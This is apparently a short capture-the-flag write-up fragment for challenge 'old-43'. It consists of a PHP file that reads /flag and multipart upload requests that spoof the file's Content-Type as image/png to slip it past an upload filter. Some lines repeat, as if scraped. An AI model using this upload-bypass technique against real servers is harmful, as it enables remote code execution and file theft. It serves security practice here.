old-43 (250)

~
❯ cat abc.php
<?php
readfile("/flag");
?>



Last updated

~
❯ cat abc.php
<?php
readfile("/flag");
?>



Last updated
------WebKitFormBoundaryAw8jlB279hoIjA82
Content-Disposition: form-data; name="file"; filename="abc.php"
Content-Type: text/php
<?php
readfile("/flag");
?>------WebKitFormBoundaryAw8jlB279hoIjA82
Content-Disposition: form-data; name="file"; filename="abc.php"
Content-Type: image/png
<?php
readfile("/flag");
?>